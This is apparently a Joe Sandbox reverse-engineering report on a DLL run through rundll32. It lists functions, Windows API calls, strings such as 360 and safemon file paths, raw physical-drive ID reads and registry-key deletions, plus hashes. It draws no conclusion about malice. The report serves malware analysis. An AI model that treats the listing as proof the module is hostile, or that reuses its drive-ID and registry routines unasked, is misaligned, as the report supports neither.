Instruction ID: 82c5ad46f6e7f4dabe07948ff870f9b922604b6aade2c66f9895ca3b1b8f50de
Opcode Fuzzy Hash: 9be342a6d8c237716bffd5caf06391c6b8b6f70f0f13e01ce8d5a989816153c8
Instruction Fuzzy Hash: 5821A171205B8881FBA6DB10E8553EA6360F7897D4F808221B69D077D5EF3DCA49C745

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006A4C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52timeCOMMON

Download Yara Rule

APIs

sscanf.LEGACY_STDIO_DEFINITIONS ref: 000000018006A519
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,0000000180069AA1), ref: 000000018006A530
LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,0000000180069AA1), ref: 000000018006A542

Strings

%hu-%hu-%hu %hu:%hu:%hu, xrefs: 000000018006A4FA

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Time$File$LocalSystemsscanf
String ID: %hu-%hu-%hu %hu:%hu:%hu
API String ID: 34346384-1004895946
Opcode ID: d723607966dc0ff236e85823f2716610310f4f89feb8e52b597ed1c2c8f9df5e
Instruction ID: 56cd0a7082cee1cdafaeaa7a6634e2a063740646281a87663471f261b7941616
Opcode Fuzzy Hash: d723607966dc0ff236e85823f2716610310f4f89feb8e52b597ed1c2c8f9df5e
Instruction Fuzzy Hash: 53210472B10B1889FB81DFA4D8803DD33B4B708788F948526EA1D96768EF34C659C750

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180040358 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018004038D
SHGetSpecialFolderPathW.SHELL32 ref: 00000001800403A0

Part of subcall function 0000000180019044: LoadLibraryExW.KERNEL32 ref: 000000018001906D
Part of subcall function 0000000180019044: FindResourceW.KERNEL32 ref: 0000000180019085
Part of subcall function 0000000180019044: SizeofResource.KERNEL32 ref: 0000000180019099
Part of subcall function 0000000180019044: LoadResource.KERNEL32 ref: 00000001800190A8
Part of subcall function 0000000180019044: LockResource.KERNEL32 ref: 00000001800190B9
Part of subcall function 0000000180019044: malloc.MSVCRT ref: 00000001800190CA
Part of subcall function 0000000180019044: memmove.MSVCRT ref: 00000001800190E1
Part of subcall function 0000000180019044: FreeResource.KERNEL32 ref: 00000001800190E9
Part of subcall function 0000000180019044: FreeLibrary.KERNEL32 ref: 00000001800190F2
Part of subcall function 0000000180019044: VerQueryValueW.VERSION ref: 000000018001911A
Part of subcall function 0000000180019044: free.MSVCRT ref: 000000018001913F

Strings

%u.%u.%u, xrefs: 00000001800403D4
\Internet Explorer\IEXPLORE.EXE, xrefs: 00000001800403A6

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Resource$FreeLibraryLoad$FindFolderLockPathQuerySizeofSpecialValuefreemallocmemmovememset
String ID: %u.%u.%u$\Internet Explorer\IEXPLORE.EXE
API String ID: 28297470-3177478685
Opcode ID: 24d6d362a50ceef5c55e60ddcc5b0fe3f6e297d637c40a6a892b7a9edbf356b3
Instruction ID: 8c267d1c97a4f3ae60188c217bf77148b2efdc3265efdf379ec177d08f4db65c
Opcode Fuzzy Hash: 24d6d362a50ceef5c55e60ddcc5b0fe3f6e297d637c40a6a892b7a9edbf356b3
Instruction Fuzzy Hash: 95118F32325A8986EB91DB25E4457DB7360F78C789F805012B68A47955DF3DC609CF00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003C7D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 000000018001AD68: InitializeCriticalSection.KERNEL32(?,?,?,?,?,000000018001AFD5), ref: 000000018001ADCE

GetModuleFileNameW.KERNEL32 ref: 000000018003C829
PathAppendW.SHLWAPI ref: 000000018003C83B
PathFileExistsW.SHLWAPI ref: 000000018003C846

Strings

..\360NetBase64.dll, xrefs: 000000018003C82F

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: FilePath$AppendCriticalExistsInitializeModuleNameSection
String ID: ..\360NetBase64.dll
API String ID: 2373086246-4183035884
Opcode ID: d761a6c3e6a00880f8900059568cee75d214a1108ffb73bc445c6367f4a0409a
Instruction ID: af5cf4f44f90b4c64e773468feb6851d22c47134ddc293a853e7e5ebda926cde
Opcode Fuzzy Hash: d761a6c3e6a00880f8900059568cee75d214a1108ffb73bc445c6367f4a0409a
Instruction Fuzzy Hash: 25114C71614A4981FBF3AB60E8953DB23A0FB8D7C9F518115B58D825A5EF28C74DC702

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002DE4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

wcsncmp.MSVCRT ref: 0000000180002E06
wcsncmp.MSVCRT ref: 0000000180002E20
PathIsDirectoryW.SHLWAPI ref: 0000000180002E34

Strings

\\?\, xrefs: 0000000180002DFF

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: wcsncmp$DirectoryPath
String ID: \\?\
API String ID: 911398208-4282027825
Opcode ID: eba105415aec120dfe2fa9ea8ee759a3358e54afb6881a7277e4926ce0db569d
Instruction ID: 9903006c7179f3997e6314bb7e882962eeb1ce79a0b7cc9db4c5bfd4c7dd6eaa
Opcode Fuzzy Hash: eba105415aec120dfe2fa9ea8ee759a3358e54afb6881a7277e4926ce0db569d
Instruction Fuzzy Hash: E501AD3036568882FBA2EB25EC457E97214BB4CBD0F848235B96A8B1E5DF6CC34DC304

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800142E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180014317
GetModuleFileNameW.KERNEL32 ref: 000000018001432E
PathAppendW.SHLWAPI ref: 0000000180014340

Part of subcall function 0000000180065EE4: PathFileExistsW.SHLWAPI ref: 0000000180065F00
Part of subcall function 0000000180065EE4: EnterCriticalSection.KERNEL32 ref: 0000000180065F2A
Part of subcall function 0000000180065EE4: LeaveCriticalSection.KERNEL32 ref: 0000000180065F73

Strings

..\safemon\FreeSaaS.tpi, xrefs: 0000000180014334

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalFilePathSection$AppendEnterExistsLeaveModuleNamememset
String ID: ..\safemon\FreeSaaS.tpi
API String ID: 154803636-205188023
Opcode ID: 5dcafe1727c8202c4fade54654e340c0afccdd89b962ceed78f6299e177fdd45
Instruction ID: d74fc56e569283819db6817bdf86699dd223bda9e6afadc26b68049d38556e4d
Opcode Fuzzy Hash: 5dcafe1727c8202c4fade54654e340c0afccdd89b962ceed78f6299e177fdd45
Instruction Fuzzy Hash: B5016D35219A8C82FBE2D721EC693D92790B78D388F80D041A4AA077A1DF2DC30DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800560C8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32synchronizationCOMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0000000180056109
CreateMutexW.KERNEL32(?,?,?,?,?,?,00000000,000000018000BCF5,?,?,?,?,?,0000000180006143), ref: 000000018005611D
LocalFree.KERNEL32(?,?,?,?,?,?,00000000,000000018000BCF5,?,?,?,?,?,0000000180006143), ref: 000000018005612B

Strings

D:P(OA;;FA;;;WD), xrefs: 00000001800560EC

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: DescriptorSecurity$ConvertCreateFreeLocalMutexString
String ID: D:P(OA;;FA;;;WD)
API String ID: 794372803-936388898
Opcode ID: 8eafacdefded48d18c198f43637dcf9209a60b0ec07301bfb3a11cb5b2937e32
Instruction ID: 0d5b46b33c23d90729eae48064ade5dfd8da35591b75e80b0d34519ac450dbba
Opcode Fuzzy Hash: 8eafacdefded48d18c198f43637dcf9209a60b0ec07301bfb3a11cb5b2937e32
Instruction Fuzzy Hash: 44014B72A14F4486EB518F21F8487A973E0F78CBD4F468221EA5D87714DF38C658C744

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002AD5C Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 381COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

_wcsicmp.MSVCRT ref: 000000018002AE4E

Part of subcall function 00000001800275E4: IIDFromString.OLE32(?,?,?,?,?,?,?,00000001800254CC), ref: 000000018002760B

Strings

CLSID, xrefs: 000000018002AEFC
ftp:, xrefs: 000000018002AE44
, xrefs: 000000018002B093

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: FromHeapProcessString_wcsicmp
String ID: $CLSID$ftp:
API String ID: 2012545421-381575252
Opcode ID: 248410c0f50f664e6cc0f1b348e136da499af2e3908b9f8e498f8b2d610c306c
Instruction ID: d299122ce3e9d517528ccb327dc5a756d1d769515d838a72f3e491c2ced193a8
Opcode Fuzzy Hash: 248410c0f50f664e6cc0f1b348e136da499af2e3908b9f8e498f8b2d610c306c
Instruction Fuzzy Hash: 41F14073301B4886EB52DB29D8407DE7361F789BE9F448311AA6D876E5DF78CA49C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006616C Relevance: 6.3, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001800661AC
LeaveCriticalSection.KERNEL32 ref: 00000001800661F5

Part of subcall function 0000000180065438: InitializeCriticalSection.KERNEL32 ref: 000000018006552A

malloc.MSVCRT ref: 000000018006621C
memmove.MSVCRT ref: 0000000180066241
free.MSVCRT ref: 0000000180066272

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterInitializeLeavefreemallocmemmove
String ID:
API String ID: 1740668140-0
Opcode ID: 22bd5bec54ccc0147c543859d5de4a8772452d611ad636121f4766ad3a15c823
Instruction ID: e94a3ea1fea36b0b32ca35adaff13378f84fa0a728ffd439e1abdc7c1a055df0
Opcode Fuzzy Hash: 22bd5bec54ccc0147c543859d5de4a8772452d611ad636121f4766ad3a15c823
Instruction Fuzzy Hash: 4D316C32605B4886EB828F15EC543D977A5F79CBE4F59C225EAA9077A5CF3CC249C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002CD40 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 142COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 000000018002CE3A

Strings

{0CF774D0-F077-11D1-B1BC-00C04F86C324}, xrefs: 000000018002CE2F
ScriptHostEncode, xrefs: 000000018002CDE1
ScriptEngine, xrefs: 000000018002CD6C

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: _wcsicmp
String ID: ScriptEngine$ScriptHostEncode${0CF774D0-F077-11D1-B1BC-00C04F86C324}
API String ID: 2081463915-2936173157
Opcode ID: 91efc328dbdbb67abd3faf589063878782725af3816d995bc94ee69e6f4a6945
Instruction ID: 292b1ab8c79ee979d74f734f58635ebd7dc6439912a4449b937fba72fcba6d7c
Opcode Fuzzy Hash: 91efc328dbdbb67abd3faf589063878782725af3816d995bc94ee69e6f4a6945
Instruction Fuzzy Hash: 5B514F72711E4986EB419F79C8807CC2760FB49BF4F449322AA3E936E5DF64C989C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003C208 Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000001,?), ref: 000000018003C25E
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000001,?), ref: 000000018003C2A7
??_V@YAXPEAX@Z.MSVCRT ref: 000000018003C30E
??_V@YAXPEAX@Z.MSVCRT ref: 000000018003C3A4

Part of subcall function 0000000180065438: InitializeCriticalSection.KERNEL32 ref: 000000018006552A

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterInitializeLeave
String ID:
API String ID: 3991485460-0
Opcode ID: 679129d8c6ac973d941e645a86577fd2f61a9db60b9c7d755c606238edf6303c
Instruction ID: ad71276d619936af7ac4a5a15bbb21467ea728ff9fc93a66917b9291cac940fe
Opcode Fuzzy Hash: 679129d8c6ac973d941e645a86577fd2f61a9db60b9c7d755c606238edf6303c
Instruction Fuzzy Hash: 04514B36201B4886EB96CF21E844B9E33A9FB48BD8F158516EE6947768CF34C658C391

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004C20C Relevance: 6.1, APIs: 4, Instructions: 128COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

SysFreeString.OLEAUT32 ref: 000000018004C293
??_V@YAXPEAX@Z.MSVCRT ref: 000000018004C2A6
??3@YAXPEAX@Z.MSVCRT ref: 000000018004C2B9
SysFreeString.OLEAUT32 ref: 000000018004C385

Part of subcall function 000000018000AF68: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B026

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: String$??2@Free$??3@Alloc
String ID:
API String ID: 1832687772-0
Opcode ID: ec64ef81cce12dd9496e54433e59b2b444f0d078a8dee198f6ac45ada33b9a8a
Instruction ID: 427e473512a75300f47d7fa230ba5ccb5e5a60885440308665830fb44559812f
Opcode Fuzzy Hash: ec64ef81cce12dd9496e54433e59b2b444f0d078a8dee198f6ac45ada33b9a8a
Instruction Fuzzy Hash: 58513A72711A0885EB91DFA5C8947ED3370FB48FE9F098621EE2A57698DF78C648C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180072146 Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0000000180072156
wcstol.MSVCRT ref: 0000000180072185
_errno.MSVCRT ref: 0000000180072197
free.MSVCRT ref: 00000001800723C6

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: _errno$freewcstol
String ID:
API String ID: 1017142431-0
Opcode ID: 9f264acde1fee37a4af08923b04b71ab41a6f4bc8a876f6580f083589344777c
Instruction ID: ea2c5121f7eb01e98f314e31e7cc383447851c7166ff6db358424aa6cc9ed06f
Opcode Fuzzy Hash: 9f264acde1fee37a4af08923b04b71ab41a6f4bc8a876f6580f083589344777c
Instruction Fuzzy Hash: C351683264478886EBA68F26A1403AE33E5F7597D8F008115FF9907798CF3ADA59CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180072242 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 000000018007224E
wcstol.MSVCRT ref: 000000018007227D
_errno.MSVCRT ref: 000000018007228F
free.MSVCRT ref: 00000001800723C6

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: _errno$freewcstol
String ID:
API String ID: 1017142431-0
Opcode ID: c26116d00bfa255a5e71194d5ccf5fda896b8abf688f47e901cb44eb358fcc84
Instruction ID: b35714efefb3a3022de44867f37344a12698415f3c6fa059f944579b3902dd1a
Opcode Fuzzy Hash: c26116d00bfa255a5e71194d5ccf5fda896b8abf688f47e901cb44eb358fcc84
Instruction Fuzzy Hash: AE415A7264478886EBB68F2594503EE37A1F7597E8F008115FF5807798CF3EDA5A8B00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000ADF4 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 000000018000AE88
GetLastError.KERNEL32 ref: 000000018000AE9A
WideCharToMultiByte.KERNEL32 ref: 000000018000AEC4
WideCharToMultiByte.KERNEL32 ref: 000000018000AEFA

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: ac5000abb9ee01d321f1ec273ada81a5511227e924beba0eb19fad604af8d780
Instruction ID: bae3b3959ef39ef5daeeababb2c60870945ab1ace41e6c98233782fb8fc2ea52
Opcode Fuzzy Hash: ac5000abb9ee01d321f1ec273ada81a5511227e924beba0eb19fad604af8d780
Instruction Fuzzy Hash: 9B31D272604B8482E764CF56B88074AB7A8F79DBD0F548628AFD947BA5CF38C645C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006C200 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 000000018006A2B8: malloc.MSVCRT(?,?,?,0000000180069638), ref: 000000018006DF0A
Part of subcall function 000000018006A2B8: SetLastError.KERNEL32(?,?,?,0000000180069638), ref: 000000018006DF1B

Part of subcall function 000000018006A32C: CreateFileA.KERNEL32 ref: 000000018006A363

memset.MSVCRT ref: 000000018006C2AB

Part of subcall function 000000018006A2C8: DeviceIoControl.KERNEL32 ref: 000000018006A2F1

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000400,?,00000000,00002000,00000000,000000018006C06D), ref: 000000018006C308

Part of subcall function 000000018006BD88: memmove.MSVCRT ref: 000000018006BDDE

Strings

\\.\PhysicalDrive%d, xrefs: 000000018006C25A
DISKID:, xrefs: 000000018006C2EC

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CloseControlCreateDeviceErrorFileHandleLastmallocmemmovememset
String ID: DISKID:$\\.\PhysicalDrive%d
API String ID: 1541746987-3765948602
Opcode ID: 0a0cd503669e2d71dfc94f1a05760105f70003c8e3e1ab21ca38997401335250
Instruction ID: 026b1f04e6263926176f9cf333c98f43658e4a5f02bea82afa83b16206533a48
Opcode Fuzzy Hash: 0a0cd503669e2d71dfc94f1a05760105f70003c8e3e1ab21ca38997401335250
Instruction Fuzzy Hash: D831063220474542FBA29B66AC00BEA7392F789BD4F608121BE5947795DF3CC749CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001E200 Relevance: 6.1, APIs: 4, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyW.ADVAPI32 ref: 000000018001E242
RegDeleteKeyW.ADVAPI32 ref: 000000018001E265
RegDeleteKeyW.ADVAPI32 ref: 000000018001E293
RegDeleteKeyW.ADVAPI32 ref: 000000018001E2B6

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Delete
String ID:
API String ID: 1035893169-0
Opcode ID: 22d0e1e140aac874fdce29ddc6509984b94616c0dddbf9d09c1d0fd8dd23a40b
Instruction ID: 40b5deca117a7cefaab46096add2d716b918ff16b730c8479b301d173d09ace7
